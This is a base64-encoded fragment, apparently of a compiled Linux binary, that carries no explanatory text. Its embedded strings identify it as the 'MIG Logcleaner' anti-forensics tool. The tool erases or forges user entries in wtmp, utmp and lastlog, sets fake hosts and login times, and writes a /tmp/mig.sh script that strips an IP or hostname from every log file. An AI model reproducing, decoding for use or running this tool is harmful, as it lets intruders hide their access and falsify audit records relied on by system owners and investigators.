+oPj///91LIO9mPj//wF1G4PsBGgsqQQIaECpBAj/NVjIBAjo5vj//4PEEI2FiPj///8Ag72I+P// +AXRHg72s+P//AHU+g72o+P//AHU1g72U+P//AHQsi4Wk+P//O4Wg+P//fx7/tZj4////taD4//// +taT4//+NRdhQ6A4DAACDxBCDvaz4//8BD4WkAAAAi4Wk+P//O4Wg+P//D4+SAAAAgz0AxwQIAXVI +g+wI/zXwxgQIjYW4+v//UOh++f//g8QQg+wI/zX0xgQIjYW4+f//UOhm+f//g8QQg+wI/zX4xgQI +jYW4+P//UOhO+f//g8QQg+wM/7WY+P///7Ww+P///7W0+P//jYW4+///UI2FyPz//1D/tZz4//// +taD4////taT4//+NRdhQ6CEKAACDxDCDvaj4//8BdXmAfdgAdCuLhaT4//87haD4//9+HYPsDItF +DP8w6AwXAACDxBCD7AxqAOiT+P//jXYAg+wI/7WY+P///7Ww+P///7W0+P//jYW4+///UI2FuPz/ +/1CNhcj8//9Q/7Wc+P///7Wg+P///7Wk+P//jUXYUOjHEQAAg8Qwg72k+P//AXQNg72k+P//AA+F +mwAAAIO9qPj//wAPhY4AAACDPQDHBAgBdUiD7Aj/NfDGBAiNhbj6//9Q6Ef4//+DxBCD7Aj/NfTG +BAiNhbj5//9Q6C/4//+DxBCD7Aj/NfjGBAiNhbj4//9Q6Bf4//+DxBCD7Aj/taT4//+Nhbj5//9Q +6H/2//+DxASJwInAUI2FuPj//1CNhbj6//9Q/7WY+P//jUXYUOiyBwAAg8Qgg72E+P//AHQj/7WY ++P//jYXY/P//UI2F2P3//1CNhdj+//9Q6PoUAACDxBCD7AxoaKkECOju9v//g8QQuAAAAADJw1WJ +5YHsmAEAAMdF8AAAAACDfQwBD4WzAAAAg+wIagJoLKkECOj79v//g8QQicCJRfSDffT/dQ24//// +/+mfAAAAjXYAkI12AIPsBGiAAQAAjYVo/v//UP919Ogl9///g8QQicCFwHUE6zaJ9o2FaP7//4PA +LIPsCP91CFDow/X//4PEEInAicCFwHW8ZoO9aP7//wh0so1F8P8A66uNdgCD7AhoLKkECP91CP91 +8P81/MYECP8F/MYECGhgqgQI/zVUyAQI6Jr1//+DxCCD7Az/dfTofPX//4PEEItF8InAycOJ9lWJ +5YHsSAUAAMeF7Pz//wAAAACD7AhqII2FyPz//1DoLPb//4PEEIPsCGgAAQAAjYXI+///UOgV9v// +g8QQg+wIaAABAACNhcj6//9Q6P71//+DxBCD7AhqAmgsqQQI6Nz1//+DxBCJwImF9Pz//4O99Pz/ +//91LIN9FAF1G4PsBGgsqQQIaIWqBAj/NVjIBAjo6vT//4PEEIPsDGr/6M31//+Qg+wIakJonKoE +COiN9f//g8QQicCJhfD8//+DvfD8////dSmDfRQBdRaD7AhowKoECP81WMgECOig9P//g8QQg+wM +av/og/X//412AIPsBGoAagD/tfT8///oDvX//4PEEIPsBGoAagD/tfD8///o+fT//4PEEIn2g+wE +aIABAACNhfj8//9Q/7X0/P//6Gr1//+DxBCJwD2AAQAAdAbpNQIAAJCNhfj8//+DwCyD7Aj/dQhQ +6AP0//+DxBCJwInAhcAPhewBAABmg734/P//CA+E3gEAAI2F7Pz///8Ai1UMi0UQKdBAOYXs/P// +dX2DfQwAdC2D7AhoLKkECP91DP91CP81/MYECP8F/MYECGgAqwQI/zVUyAQI6L3z//+DxCCLhfz8 +//+Jhej8//+D7AiNhfj8//+DwAhQjYXI/P//UOjF9P//g8QQg+wIjYX4/P//g8BMUI2FyPv//1Do +qfT//4PEEOkN////kItFDItVECnCidA5hez8//8PhQQBAAD/BQDHBAiD7AhqEI2FuPr//1DoE/T/ +/4PEEIPsDI2F+Pz//4PACFDojvP//4PEBInAicBAUOhA8///g8QQicCj+MYECIPsCI2F+Pz//4PA +CFD/NfjGBAjoLvT//4PEEIPsDI2F+Pz//4PATFDoSfP//4PEBInAicBAUOj78v//g8QQicCj8MYE +CIPsCI2F+Pz//4PATFD/NfDGBAjo6fP//4PEEIPsBP+1TP7//2gnqwQIjYW4+v//UOis8///g8QQ +g+wMjYW4+v//UOjq8v//g8QEicCJwEBQ6Jzy//+DxBCJwKP0xgQIg+wE/7VM/v//aCerBAj/NfTG +BAjoafP//4PEEIN9DAAPhOj9//+D7ARogAEAAI2F+Pz//1D/tfD8///oAvL//4PEEOnG/f//ifaD +7ARogAEAAI2F+Pz//1D/tfD8///o3vH//4PEEOmi/f//ifaD7Az/tfT8///o5vH//4PEEIPsDP+1 +8Pz//+jV8f//g8QQg30MAHU5g73s/P//AHQwg+wIaCypBAj/dQj/tez8////NfzGBAj/BfzGBAho +QKsECP81VMgECOim8f//g8Qgx4Xs/P//AAAAAIPsCGoCaHCrBAjoSvL//4PEEInAiYX0/P//g730 +/P///3Uug30UAXUbg+wEaHCrBAhohaoECP81WMgECOhY8f//g8QQg+wMav/oO/L//412AIPsCGpC +aH6rBAjo+fH//4PEEInAiYXw/P//g73w/P///3Ucg30UAXUWg+wIaKCrBAj/NVjIBAjoDPH//4PE +EIPsBGoAagD/tfT8///oh/H//4PEEIPsBGoAagD/tfD8///ocvH//4PEEI12AIPsBGiAAQAAjYV4 +/v//UP+19Pz//+ji8f//g8QQicA9gAEAAHQG6REBAACQjYV4/v//g8Asg+wI/3UIUOh78P//g8QQ +icCJwIXAD4XIAAAAjYXs/P///wCLhej8//87hXz+//8PhYIAAACNlcj8//+NhXj+//+DwAiD7AhS +UOg58P//g8QQicCJwIXAdV6Nlcj7//+NhXj+//+DwEyD7AhSUOgV8P//g8QQicCJwIXAdTqDfQwA +D4RE////g+wMaHCrBAj/dQj/NfzGBAj/BfzGBAho4KsECP81VMgECOj57///g8Qg6RX///+Qg30M +AA+ECv///4PsBGiAAQAAjYV4/v//UP+18Pz//+ic7///g8QQ6ej+//+D7ARogAEAAI2FeP7//1D/ +tfD8///oeu///4PEEOnG/v//ifaD7Az/tfT8///ogu///4PEEIPsDP+18Pz//+hx7///g8QQg30M +AHU5g73s/P//AHQwg+wIaHCrBAj/dQj/tez8////NfzGBAj/BfzGBAhoQKsECP81VMgECOhC7/// +g8Qgg+wIaHCrBAhoLKkECGhwqwQIaCypBAhoIKwECI2FyPr//1DoJ/D//4PEIIPsDI2FyPr//1Do +Fe///4PEELgAAAAAycONdgBVieWB7FgBAACD7AhoJAEAAI2FuP7//1Doq+///4PEEIPsDP91COit +7///g8QQicCJRfSDffQAD4T3AAAAg+wIagJoWKwECOhs7///g8QQicCJhbT+//+DvbT+//8AD4jQ +AAAAg+wEagCLRfSLUAiJ0MHgAwHQweADAdDB4AJQ/7W0/v//6P7u//+DxBCDPQDHBAgBdUaDfRwA +dECD7ARoAAEAAP91EI2FuP7//4PAJFDo4u7//4PEEIPsBGog/3UUjYW4/v//g8AEUOjI7v//g8QQ +i0UYiYW4/v//g+wMaFisBAj/dQj/NfzGBAj/BfzGBAhogKwECP81VMgECOj17f//g8Qgg+wEaCQB +AACNhbj+//9Q/7W0/v//6Kjt//+DxBCD7Az/tbT+///ot+3//4PEELgAAAAAycOQVYnlgexoBQAA +x4XY/P//AAAAAMeF1Pz//wAAAACLRSCJhfD8///HhfT8//8AAAAAi0UkiYXo/P//x4Xs/P//AAAA +AIPsCGogjYWo/P//UOg47v//g8QQg+wIaAABAACNhaj7//9Q6CHu//+DxBCD7AhoAAEAAI2FqPr/ +/1DoCu7//4PEEIN9EP8PhJIHAACD7AhqAmgsqQQI6N7t//+DxBCJwImF4Pz//4O94Pz///91LoN9 +KAF1G4PsBGgsqQQIaIWqBAj/NVjIBAjo7Oz//4PEEIPsDGr/6M/t//+NdgCD7AhqQmicqgQI6I3t +//+DxBCJwImF3Pz//4O93Pz///91KYN9KAF1FoPsCGjAqgQI/zVYyAQI6KDs//+DxBCD7Axq/+iD +7f//jXYAg+wEagBqAP+14Pz//+gO7f//g8QQg+wEagBqAP+13Pz//+j57P//g8QQifaD7ARogAEA +AI2F+Pz//1D/teD8///oau3//4PEEInAPYABAAB0BukhAwAAkI2F+Pz//4PALIPsCP91CFDoA+z/ +/4PEEInAicCFwA+FiAIAAGaDvfj8//8ID4R6AgAAjYXY/P///wCLVQyLRRAp0EA5hdj8//8PhSEB +AACNhdT8////AIPsCGgsqQQI/3UM/3UI/zX8xgQI/wX8xgQIaMCsBAj/NVTIBAjot+v//4PEIIuF +/Pz//4mF5Pz//4PsCI2F+Pz//4PACFCNhaj8//9Q6L/s//+DxBCD7AiNhfj8//+DwExQjYWo+/// +UOij7P//g8QQi0UYgDgAdC+D7AhqII2F+Pz//4PALFDoJOz//4PEEIPsCP91GI2F+Pz//4PALFDo +bOz//4PEEItFHIA4AHQyg+wIaAABAACNhfj8//+DwExQ6Orr//+DxBCD7Aj/dRyNhfj8//+DwExQ +6DLs//+DxBCDfSAAdAyLhfD8//+JhUz+//+D7ARogAEAAI2F+Pz//1D/tdz8///oo+r//4PEEOln +/v//jXYAi0UMi1UQKcKJ0DmF2Pz//w+FBAEAAP8FAMcECIPsCGoQjYWY+v//UOhr6///g8QQg+wM +jYX4/P//g8AIUOjm6v//g8QEicCJwEBQ6Jjq//+DxBCJwKP4xgQIg+wIjYX4/P//g8AIUP81+MYE +COiG6///g8QQg+wMjYX4/P//g8BMUOih6v//g8QEicCJwEBQ6FPq//+DxBCJwKPwxgQIg+wIjYX4 +/P//g8BMUP818MYECOhB6///g8QQg+wE/7VM/v//aCerBAiNhZj6//9Q6ATr//+DxBCD7AyNhZj6 +//9Q6ELq//+DxASJwInAQFDo9On//4PEEInAo/TGBAiD7AT/tUz+//9oJ6sECP819MYECOjB6v// +g8QQg+wEaIABAACNhfj8//9Q/7Xc/P//6GTp//+DxBDpKP3//4O91Pz//wF1SI2VqPz//42F+Pz/ +/4PACIPsCFJQ6Erp//+DxBCJwInAhcB1JGaDvfj8//8IdRqNhdT8////CIN9JAB0DIuF6Pz//4mF +TP7//4PsBGiAAQAAjYX4/P//UP+13Pz//+jx6P//g8QQ6bX8//+Qg+wM/7Xg/P//6Pro//+DxBCD +7Az/tdz8///o6ej//4PEEMeF2Pz//wAAAADHhdT8//8AAAAAg+wIagJocKsECOiT6f//g8QQicCJ +heD8//+DveD8////dSuDfSgBdRuD7ARocKsECGiFqgQI/zVYyAQI6KHo//+DxBCD7Axq/+iE6f// +g+wIakJofqsECOhF6f//g8QQicCJhdz8//+Dvdz8////dRyDfSgBdRaD7AhooKsECP81WMgECOhY +6P//g8QQg+wEagBqAP+14Pz//+jT6P//g8QQg+wEagBqAP+13Pz//+i+6P//g8QQjXYAg+wEaIAB +AACNhXj+//9Q/7Xg/P//6C7p//+DxBCJwD2AAQAAdAbp+QEAAJCNhXj+//+DwCyD7Aj/dQhQ6Mfn +//+DxBCJwInAhcAPhWQBAACNhdj8////AIuF5Pz//zuFfP7//w+FJgEAAI2VqPz//42FeP7//4PA +CIPsCFJQ6IXn//+DxBCJwInAhcAPhf4AAACNlaj7//+NhXj+//+DwEyD7AhSUOhd5///g8QQicCJ +wIXAD4XWAAAAjYXU/P///wCD7AxocKsECP91CP81/MYECP8F/MYECGgArQQI/zVUyAQI6D/n//+D +xCCLRRiAOAB0L4PsCGogjYV4/v//g8AsUOjw5///g8QQg+wI/3UYjYV4/v//g8AsUOg46P//g8QQ +i0UcgDgAdDKD7AhoAAEAAI2FeP7//4PATFDotuf//4PEEIPsCP91HI2FeP7//4PATFDo/uf//4PE +EIN9IAB0CYuF8Pz//4lFzIPsBGiAAQAAjYV4/v//UP+13Pz//+hy5v//g8QQ6XL+//+J9oPsBGiA +AQAAjYV4/v//UP+13Pz//+hO5v//g8QQ6U7+//+J9oO91Pz//wF1RY2VqPz//42FeP7//4PACIPs +CFJQ6DLm//+DxBCJwInAhcB1IWaDvXj+//8IdReNhdT8////CIN9JAB0CYuF6Pz//4lFzIPsBGiA +AQAAjYV4/v//UP+13Pz//+jc5f//g8QQ6dz9//+D7Az/teD8///o5uX//4PEEIPsDP+13Pz//+jV +5f//g8QQx4XU/P//AAAAAIPsCGhwqwQIaCypBAhocKsECGgsqQQIaCCsBAiNhaj6//9Q6MDm//+D +xCCD7AyNhaj6//9Q6K7l//+DxBC4AAAAAMnDVYnlgeyYBQAAx4Vs+///AAAAAMeFaPv//wAAAACD +7AhoAAEAAI2FaPr//1DoM+b//4PEEGbHhfj8//8HAMeF/Pz//wAAAABmx4VE/v//AABmx4VG/v// +AADHhUj+//8AAAAAi0UkiYVM/v//x4VQ/v//AAAAAIPsCP91GI2F+Pz//4PALFDoOeb//4PEEIPs +CP91HI2F+Pz//4PACFDoIeb//4PEEIPsCP91II2F+Pz//4PATFDoCeb//4PEEGbHhXj7//8IAMeF +fPv//wAAAABmx4XE/P//AABmx4XG/P//AADHhcj8//8AAAAAi0UoiYXM/P//x4XQ/P//AAAAAIPs +CP91GI2FePv//4PALFDor+X//4PEEIPsCP91HI2FePv//4PACFDol+X//4PEEIPsCP91II2FePv/ +/4PATFDof+X//4PEEIPsCGoCaCypBAjo/eT//4PEEInAiYV0+///g710+////w+EZQIAAIPsCGpC +aJyqBAjo1uT//4PEEInAiYVw+///g71w+////3Ucg30sAXUWg+wIaMCqBAj/NVjIBAjo6eP//4PE +EJCQg+wEaIABAACNhXj+//9Q/7V0+///6Ork//+DxBCJwD2AAQAAdAbpJQEAAJCNhXj+//+DwCyD +7Aj/dQhQ6IPj//+DxBCJwInAhcAPhdwAAABmg714/v//CA+EzgAAAI2FbPv///8Ai1UMi0UQKdBA +OYVs+///D4WNAAAAg+wEaIABAACNhXj+//9Q/7Vw+///6B/j//+DxBCD7ARogAEAAI2F+Pz//1D/ +tXD7///oAuP//4PEEIPsBGiAAQAAjYV4+///UP+1cPv//+jl4v//g8QQg+wEaCypBAj/dQj/dQz/ +dRj/NfzGBAj/BfzGBAhoQK0ECP81VMgECOjl4v//g8Qg6fn+//+Qg+wEaIABAACNhXj+//9Q/7Vw ++///6JLi//+DxBDp1v7//4n2g+wEaIABAACNhXj+//9Q/7Vw+///6G7i//+DxBDpsv7//4n2i0UI +gDgAdXWDvWj7//8AdWyD7ARogAEAAI2F+Pz//1D/tXD7///oOeL//4PEEIPsBGiAAQAAjYV4+/// +UP+1cPv//+gc4v//g8QQg+wMaCypBAj/dRj/NfzGBAj/BfzGBAhooK0ECP81VMgECOgi4v//g8Qg +jYVo+////wCD7Az/tXT7///o+eH//4PEEIPsDP+1cPv//+jo4f//g8QQaCypBAhoLKkECGjgrQQI +jYVo+v//UOjq4v//g8QQg+wMjYVo+v//UOjY4f//g8QQ6ySNdgCDfSwBdRuD7ARoLKkECGiFqgQI +/zVYyAQI6KLh//+DxBDHhWz7//8AAAAAx4Vo+///AAAAALgAAAAAycNVieWB7PgDAACD7Aho5wMA +AI2FCPz//1DoN+L//4PEEIPsDP91EP91DP91CGggrgQIjYUI/P//UOhX4v//g8Qgg+wMjYUI/P// +UOhF4f//g8QQg+wMaNqwBAjoNeH//4PEEIPsDGjvsAQI6CXh//+DxBCD7Az/dQj/dRD/dQz/NfzG +BAj/BfzGBAhoALEECOhw4f//g8Qgg+wMaO+wBAjoEOH//4PEEIPsDGg6sQQI6ADh//+DxBCD7Axo +RrEECOjw4P//g8QQg+wMaFKxBAjo4OD//4PEELgAAAAAycOJ9lWJ5YPsCIPsDGiAqAQI6BHh//+D +xBCD7AxowKgECOgB4f//g8QQg+wMaGCxBAjo8eD//4PEEIPsCP91CGigsQQI6N7g//+DxBCD7Axo +7bEECOjO4P//g8QQg+wMaCCyBAjovuD//4PEEIPsDGiAsgQI6K7g//+DxBCD7AxowLIECOie4P// +g8QQg+wMaCCzBAjojuD//4PEEIPsDGiAswQI6H7g//+DxBCD7AxowLMECOhu4P//g8QQg+wMaCC0 +BAjoXuD//4PEEIPsDGhgtAQI6E7g//+DxBCD7AxooLQECOg+4P//g8QQg+wMaOC0BAjoLuD//4PE +EIPsDGhAtQQI6B7g//+DxBCD7AxogrUECOgO4P//g8QQg+wI/3UIaKC1BAjo+9///4PEEIPsCP91 +CGjgtQQI6Ojf//+DxBCD7Aj/dQhoALYECOjV3///g8QQg+wI/3UIaEC2BAjowt///4PEEIPsCP91 +CGiAtgQI6K/f//+DxBC4AAAAAMnDkJCQkJCQkJCQVYnlU4PsBKEIxwQIuwjHBAiD+P90Fo12AI28 +JwAAAACD6wT/0IsDg/j/dfRYW13DVYnlg+wIiexdw422AAAAAFWJ5VNS6AAAAABbgcMOHwAAjXYA +6Ffg//+LXfzJwwAAAwAAAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvdmFyL2xvZy8AdTpu +OkQ6YTpiOlU6VDpIOkk6TzpSQWQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChtbMDsz +Mm0qKioqKioqKioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAA +ABtbMDszMm0qIE1JRyBMb2djbGVhbmVyIHYyLjAgYnkgG1swOzMxbW5vMSAbWzA7MzJtKhtbMG0K +AAAAAAAAAAAbWzA7MzJtKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqG1swbQoKAC92YXIv +bG9nL3d0bXAAAAAAAAAARXJyb3Igb3BlbmluZyAlcyBmaWxlIHRvIGNvdW50IHJlY29yZHMKAAoA +AAAAAAAAkIwECJyKBAicigQILIsECJyKBAicigQInIoECAiMBAgwjAQInIoECJyKBAicigQInIoE +CJyKBAhYjAQInIoECJyKBAiAjAQInIoECOCLBAi4iwQInIoECJyKBAicigQInIoECJyKBAicigQI +nIoECJyKBAicigQInIoECJyKBAhoiwQIkIsECJyKBAigjAQInIoECJyKBAicigQInIoECJyKBAic +igQInIoECJyKBAicigQIDIsECJyKBAicigQInIoECJyKBAicigQInIoECOyKBAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAWzB4JWRdICVkIHVzZXJzICIlcyIgZGV0ZWN0ZWQgaW4gJXMKAEVy +cm9yIG9wZW5pbmcgJXMgZmlsZQoAL3RtcC9XVE1QLlRNUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +RXJyb3Igb3BlbmluZyAvdG1wL1dUTVAuVE1QIGZpbGUKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAFsweCVkXSBSZW1vdmVkICIlcyIgZW50cnkgIyVkIGZyb20gJXMKACVsZAAAAAAAAAAA +AAAAAAAAAAAAAAAAAABbMHglZF0gUmVtb3ZlZCAlZCBlbnRyaWVzIG9mIHVzZXIgIiVzIiBmcm9t +ICVzCgAvdmFyL3J1bi91dG1wAC90bXAvVVRNUC5UTVAAAAAAAAAAAAAAAAAAAAAAAAAAAABFcnJv +ciBvcGVuaW5nIC90bXAvVVRNUC5UTVAgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAWzB4JWRdIFJlbW92ZWQgIiVzIiBjb3Jlc3BvbmRpbmcgZW50cnkgZnJvbSAlcwoAAAAAAAAA +AAAAAAAAAAAAAG12IC90bXAvV1RNUC5UTVAgJXM7bXYgL3RtcC9VVE1QLlRNUCAlcztjaG1vZCA2 +NDQgJXMgJXMAL3Zhci9sb2cvbGFzdGxvZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVkXSBD +aGFuZ2luZyAiJXMiIGNvcmVzcG9uZGluZyBlbnRyeSBpbiAlcwoAAAAAAAAAAAAAAAAAAAAAAABb +MHglZF0gUmVwbGFjZWQgIiVzIiBlbnRyeSAjJWQgZnJvbSAlcwoAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAWzB4JWRdIFJlcGxhY2VkICIlcyIgY29yZXNwb25kaW5nIGVudHJ5IGZyb20gJXMKAAAA +AAAAAAAAAAAAAAAAAFsweCVkXSBBZGRlZCAgdXNlciAiJXMiIGJlZm9yZSAlZCBlbnRyeSBvZiB1 +c2VyICIlcyIgaW4gJXMgZmlsZQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsweCVk +XSBBZGRlZCAgdXNlciAiJXMiIGVudHJ5IG9uIHRvcCBvZiAgJXMgZmlsZQoAAAAAAAAAAAAAAAAA +AABtdiAvdG1wL1dUTVAuVE1QICVzO2NobW9kIDY0NCAlcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAZWNobyAiZmluZCAlcyAtdHlwZSBmfGdyZXAgLXYgd3RtcHxncmVwIC12IHV0bXB8 +Z3JlcCAtdiBsYXN0bG9nPi90bXAvZGlycy5JUCI+L3RtcC9taWcuc2g7ZWNobyAiaWYgWyAtcyAv +dG1wL2RpcnMuSVAgXSI+Pi90bXAvbWlnLnNoO2VjaG8gdGhlbj4+L3RtcC9taWcuc2g7ZWNobyAi +c2V0IFxgY2F0IC90bXAvZGlycy5JUFxgIj4+L3RtcC9taWcuc2g7ZWNobyAiZm9yIEYxIGluIFxg +ZWNobyBcJEBcYCI+Pi90bXAvbWlnLnNoO2VjaG8gZG8+Pi90bXAvbWlnLnNoO2VjaG8gImNhdCBc +IlwkRjFcInxncmVwIC12IFwiJXNcIj4vdG1wL0YxLnRtcDtjYXQgL3RtcC9GMS50bXA+XCJcJEYx +XCIiPj4vdG1wL21pZy5zaDtlY2hvIGRvbmU+Pi90bXAvbWlnLnNoO2VjaG8gZmk+Pi90bXAvbWln +LnNoO2VjaG8gImlmIFsgLXMgL3RtcC9kaXJzLklQIF0iPj4vdG1wL21pZy5zaDtlY2hvIHRoZW4+ +Pi90bXAvbWlnLnNoO2VjaG8gInNldCBcYGNhdCAvdG1wL2RpcnMuSVBcYCI+Pi90bXAvbWlnLnNo +O2VjaG8gImZvciBGMiBpbiBcYGVjaG8gXCRAXGAiPj4vdG1wL21pZy5zaDtlY2hvIGRvPj4vdG1w +L21pZy5zaDtlY2hvICJjYXQgXCJcJEYyXCJ8Z3JlcCAtdiBcIiVzXCI+L3RtcC9GMi50bXA7Y2F0 +IC90bXAvRjIudG1wPlwiXCRGMlwiIj4+L3RtcC9taWcuc2g7ZWNobyBkb25lPj4vdG1wL21pZy5z +aDtlY2hvIGZpPj4vdG1wL21pZy5zaABjaG1vZCAreCAvdG1wL21pZy5zaAAvdG1wL21pZy5zaAAA +AAAAAFsweCVkXSBSZW1vdmVkICIlcyIgYW5kICIlcyIgc3RyaW5ncyBvdXQgb2YgJXMgZGlyZWNv +dHJ5CgAvdG1wL0YxLnRtcAAvdG1wL0YyLnRtcAAvdG1wL2RpcnMuSVAAABtbMDszMm0qKioqKioq +KioqKioqKioqKioqKioqKioqKioqKiobWzBtCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c2FnZTog +JXMgWy11XSBbLW5dIFstZF0gWy1hXSBbLWJdIFstUl0gWy1BXSBbLVVdIFstVF0gWy1IXSBbLUld +IFstT10gWy1kXQoKACBbLXUgPHVzZXI+XQktIHVzZXJuYW1lCgAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAACBbLW4gPG4+XQktIHVzZXJuYW1lIHJlY29yZCBudW1iZXIsIDAgcmVtb3ZlcyBhbGwg +cmVjb3JkcyAoZGVmYXVsdDogMSkKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbLWQgPGRpcj5d +CS0gbG9nIGRpcmVjdG9yeSAoZGVmYXVsdDogL3Zhci9sb2cvKQoAAAAAAAAAAAAAAAAAAAAgWy1h +IDxzdHJpbmcxPl0JLSBzdHJpbmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9n +IGRpciAoaXA/KQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1iIDxzdHJpbmcyPl0JLSBzdHJp +bmcgdG8gcmVtb3ZlIG91dCBvZiBldmVyeSBmaWxlIGluIGEgbG9nIGRpciAoaG9zdG5hbWU/KQoA +AAAAAAAAAAAAAAAAAAAAAAAgWy1SXQkJLSByZXBsYWNlIGRldGFpbHMgb2Ygc3BlY2lmaWVkIHVz +ZXIgZW50cnkKAAAAAAAAAAAAAAAAAAAAIFstQV0JCS0gYWRkIG5ldyBlbnRyeSBiZWZvcmUgc3Bl +Y2lmaWVkIHVzZXIgZW50cnkgKGRlZmF1bHQ6IDFzdCBlbnRyeSBpbiBsaXN0KQoAAAAAAAAAAAAA +AAAAAAAAIFstVSA8dXNlcj5dCS0gbmV3IHVzZXJuYW1lIHVzZWQgaW4gLVIgb2YgLUEKAAAAAAAA +AAAAAAAAAAAAAAAAACBbLVQgPHR0eT5dCS0gbmV3IHR0eSB1c2VkIGluIC1BCgAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAgWy1IIDxob3N0Pl0JLSBuZXcgaG9zdG5hbWUgdXNlZCBpbiAt +UiBvciAtQQoAAAAAAAAAAAAAAAAAAAAAAAAAIFstSSA8bj5dCS0gbmV3IGxvZyBpbiB0aW1lIHVz +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 